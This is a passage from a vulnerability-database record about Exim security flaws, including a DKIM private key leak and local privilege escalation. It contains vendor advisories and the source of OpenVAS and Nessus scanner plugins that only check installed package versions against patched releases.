See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851601\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-08-30 07:23:21 +0200 (Wed, 30 Aug 2017)\");\n script_cve_id(\"CVE-2016-1531\", \"CVE-2016-9963\", \"CVE-2017-1000369\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for exim (openSUSE-SU-2017:2289-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for exim fixes the following issues:\n\n Changes in exim:\n\n - specify users with ref:mail, to make them dynamic. 
(boo#1046971)\n\n - CVE-2017-1000369: Fixed memory leaks that could be exploited to 'stack\n crash' local privilege escalation (boo#1044692)\n\n - Require user(mail) group(mail) to meet new users handling in TW.\n\n - Prerequire permissions (fixes rpmlint).\n\n - conditionally disable DANE on SuSE versions with OpenSSL 1.0\n\n - CVE-2016-1531: when installed setuid root, allows local users to gain\n privileges via the perl_startup argument.\n\n - CVE-2016-9963: DKIM information leakage (boo#1015930)\n\n\n - Makefile tuning:\n + add sqlite support\n + disable WITH_OLD_DEMIME\n + enable AUTH_CYRUS_SASL\n + enable AUTH_TLS\n + enable SYSLOG_LONG_LINES\n + enable SUPPORT_PAM\n + MAX_NAMED_LIST=64\n + enable EXPERIMENTAL_DMARC\n + enable EXPERIMENTAL_EVENT\n + enable EXPERIMENTAL_PROXY\n + enable EXPERIMENTAL_CERTNAMES\n + enable EXPERIMENTAL_DSN\n + enable EXPERIMENTAL_DANE\n + enable EXPERIMENTAL_SOCKS\n + enable EXPERIMENTAL_INTERNATIONAL\");\n\n script_tag(name:\"affected\", value:\"exim on openSUSE Leap 42.3, openSUSE Leap 42.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:2289-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSELeap42\\.2|openSUSELeap42\\.3)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.86.2~10.6.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debuginfo\", 
rpm:\"exim-debuginfo~4.86.2~10.6.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debugsource\", rpm:\"exim-debugsource~4.86.2~10.6.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon\", rpm:\"eximon~4.86.2~10.6.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon-debuginfo\", rpm:\"eximon-debuginfo~4.86.2~10.6.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximstats-html\", rpm:\"eximstats-html~4.86.2~10.6.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.86.2~14.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debuginfo\", rpm:\"exim-debuginfo~4.86.2~14.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debugsource\", rpm:\"exim-debugsource~4.86.2~14.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon\", rpm:\"eximon~4.86.2~14.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon-debuginfo\", rpm:\"eximon-debuginfo~4.86.2~14.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximstats-html\", rpm:\"eximstats-html~4.86.2~14.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:24", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9963"], "description": "\nThe Exim project reports:\n\nExim leaks the 
private DKIM signing key to the log files.\n\t Additionally, if the build option EXPERIMENTAL_DSN_INFO=yes is used,\n\t the key material is included in the bounce message.\n\n", "edition": 7, "modified": "2016-12-15T00:00:00", "published": "2016-12-15T00:00:00", "id": "E7002B26-CAAA-11E6-A76A-9F7324E5534E", "href": "https://vuxml.freebsd.org/freebsd/e7002b26-caaa-11e6-a76a-9f7324e5534e.html", "title": "exim -- DKIM private key leak", "type": "freebsd", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}], "debian": [{"lastseen": "2020-08-12T01:10:04", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9963"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3747-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nDecember 25, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : exim4\nCVE ID : CVE-2016-9963\n\nBjoern Jacke discovered that Exim, Debian's default mail transfer agent,\nmay leak the private DKIM signing key to the log files if specific\nconfiguration options are met.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 4.84.2-2+deb8u2.\n\nWe recommend that you upgrade your exim4 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2016-12-25T10:08:40", "published": "2016-12-25T10:08:40", "id": "DEBIAN:DSA-3747-1:65DFE", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00331.html", "title": "[SECURITY] [DSA 3747-1] exim4 security update", "type": "debian", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-30T02:21:28", "bulletinFamily": 
"unix", "cvelist": ["CVE-2016-9963"], "description": "Package : exim4\nVersion : 4.80-7+deb7u4\nCVE ID : CVE-2016-9963\n\n\nBjoern Jacke discovered that Exim, Debian's default mail transfer agent,\nmay leak the private DKIM signing key to the log files if specific\nconfiguration options are met.\n\nFor Debian 7 \"Wheezy\", these problems have been fixed in version\n4.80-7+deb7u4.\n\nWe recommend that you upgrade your exim4 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 3, "modified": "2016-12-25T11:32:10", "published": "2016-12-25T11:32:10", "id": "DEBIAN:DLA-762-1:0D8D2", "href": "https://lists.debian.org/debian-lts-announce/2016/debian-lts-announce-201612/msg00038.html", "title": "[SECURITY] [DLA 762-1] exim4 security update", "type": "debian", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}], "amazon": [{"lastseen": "2020-11-10T12:37:37", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9963"], "description": "**Issue Overview:**\n\nIt was found that Exim leaked DKIM signing private keys to the \"mainlog\" log file. As a result, an attacker with access to system log files could potentially access these leaked DKIM private keys.\n\n \n**Affected Packages:** \n\n\nexim\n\n \n**Issue Correction:** \nRun _yum update exim_ to update your system. 
\n\n\n \n\n\n**New Packages:**\n \n \n i686: \n exim-4.88-2.11.amzn1.i686 \n exim-mon-4.88-2.11.amzn1.i686 \n exim-mysql-4.88-2.11.amzn1.i686 \n exim-pgsql-4.88-2.11.amzn1.i686 \n exim-debuginfo-4.88-2.11.amzn1.i686 \n exim-greylist-4.88-2.11.amzn1.i686 \n \n src: \n exim-4.88-2.11.amzn1.src \n \n x86_64: \n exim-pgsql-4.88-2.11.amzn1.x86_64 \n exim-mon-4.88-2.11.amzn1.x86_64 \n exim-debuginfo-4.88-2.11.amzn1.x86_64 \n exim-mysql-4.88-2.11.amzn1.x86_64 \n exim-4.88-2.11.amzn1.x86_64 \n exim-greylist-4.88-2.11.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2017-03-06T14:00:00", "published": "2017-03-06T14:00:00", "id": "ALAS-2017-804", "href": "https://alas.aws.amazon.com/ALAS-2017-804.html", "title": "Medium: exim", "type": "amazon", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2021-01-01T01:19:32", "description": "It was found that Exim leaked DKIM signing private keys to the\n'mainlog' log file. As a result, an attacker with access to system log\nfiles could potentially access these leaked DKIM private keys.", "edition": 25, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-03-07T00:00:00", "title": "Amazon Linux AMI : exim (ALAS-2017-804)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9963"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:exim-mysql", "p-cpe:/a:amazon:linux:exim-mon", "p-cpe:/a:amazon:linux:exim-debuginfo", "p-cpe:/a:amazon:linux:exim", "p-cpe:/a:amazon:linux:exim-greylist", "p-cpe:/a:amazon:linux:exim-pgsql", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2017-804.NASL", "href": "https://www.tenable.com/plugins/nessus/97556", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2017-804.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97556);\n script_version(\"3.2\");\n 
script_cvs_date(\"Date: 2018/04/18 15:09:36\");\n\n script_cve_id(\"CVE-2016-9963\");\n script_xref(name:\"ALAS\", value:\"2017-804\");\n\n script_name(english:\"Amazon Linux AMI : exim (ALAS-2017-804)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was found that Exim leaked DKIM signing private keys to the\n'mainlog' log file. As a result, an attacker with access to system log\nfiles could potentially access these leaked DKIM private keys.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2017-804.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update exim' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-greylist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-mon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This 
script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"exim-4.88-2.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-debuginfo-4.88-2.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-greylist-4.88-2.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-mon-4.88-2.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-mysql-4.88-2.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-pgsql-4.88-2.11.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-greylist / exim-mon / exim-mysql / etc\");\n}\n", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-06T10:59:28", "description": "The Exim project 
reports :\n\nExim leaks the private DKIM signing key to the log files.\nAdditionally, if the build option EXPERIMENTAL_DSN_INFO=yes is used,\nthe key material is included in the bounce message.", "edition": 29, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2016-12-27T00:00:00", "title": "FreeBSD : exim -- DKIM private key leak (e7002b26-caaa-11e6-a76a-9f7324e5534e)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9963"], "modified": "2016-12-27T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:exim"], "id": "FREEBSD_PKG_E7002B26CAAA11E6A76A9F7324E5534E.NASL", "href": "https://www.tenable.com/plugins/nessus/96122", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96122);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-9963\");\n\n script_name(english:\"FreeBSD : exim -- DKIM private key leak (e7002b26-caaa-11e6-a76a-9f7324e5534e)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Exim project reports :\n\nExim leaks the private DKIM signing key to the log files.\nAdditionally, if the build option EXPERIMENTAL_DSN_INFO=yes is used,\nthe key material is included in the bounce message.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://exim.org/static/doc/CVE-2016-9963.txt\"\n );\n # https://vuxml.freebsd.org/freebsd/e7002b26-caaa-11e6-a76a-9f7324e5534e.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?02b7365f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim>4.69<4.87.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:pkg_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-12T09:44:11", "description": "Bjoern Jacke discovered that Exim, Debian's default mail transfer\nagent, may leak the private DKIM signing key to the log files if\nspecific configuration options are met.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n4.80-7+deb7u4.\n\nWe recommend that you upgrade your exim4 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 22, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2016-12-27T00:00:00", "title": "Debian DLA-762-1 : exim4 security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9963"], "modified": "2016-12-27T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:exim4-daemon-heavy-dbg", "p-cpe:/a:debian:debian_linux:exim4-daemon-heavy", "p-cpe:/a:debian:debian_linux:exim4-base", "p-cpe:/a:debian:debian_linux:exim4-daemon-light-dbg", "p-cpe:/a:debian:debian_linux:exim4-daemon-light", "p-cpe:/a:debian:debian_linux:eximon4", "p-cpe:/a:debian:debian_linux:exim4-dbg", "cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:exim4-config", "p-cpe:/a:debian:debian_linux:exim4", "p-cpe:/a:debian:debian_linux:exim4-dev"], "id": "DEBIAN_DLA-762.NASL", "href": "https://www.tenable.com/plugins/nessus/96097", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-762-1. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96097);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-9963\");\n\n script_name(english:\"Debian DLA-762-1 : exim4 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Bjoern Jacke discovered that Exim, Debian's default mail transfer\nagent, may leak the private DKIM signing key to the log files if\nspecific configuration options are met.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n4.80-7+deb7u4.\n\nWe recommend that you upgrade your exim4 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/12/msg00038.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/exim4\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-config\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-heavy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-heavy-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-light\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-light-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:eximon4\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"exim4\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-base\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-config\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-heavy\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-heavy-dbg\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-light\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-light-dbg\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-dbg\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-dev\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"eximon4\", reference:\"4.80-7+deb7u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) 
security_note(port:0, extra:deb_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T06:44:17", "description": "Bjoern Jacke discovered that Exim incorrectly handled DKIM keys. In\ncertain configurations, private DKIM signing keys could be leaked to\nthe log files.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 31, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-01-06T00:00:00", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 16.04 LTS / 16.10 : exim4 vulnerability (USN-3164-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9963"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04", "p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy", "cpe:/o:canonical:ubuntu_linux:16.10", "p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3164-1.NASL", "href": "https://www.tenable.com/plugins/nessus/96336", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from 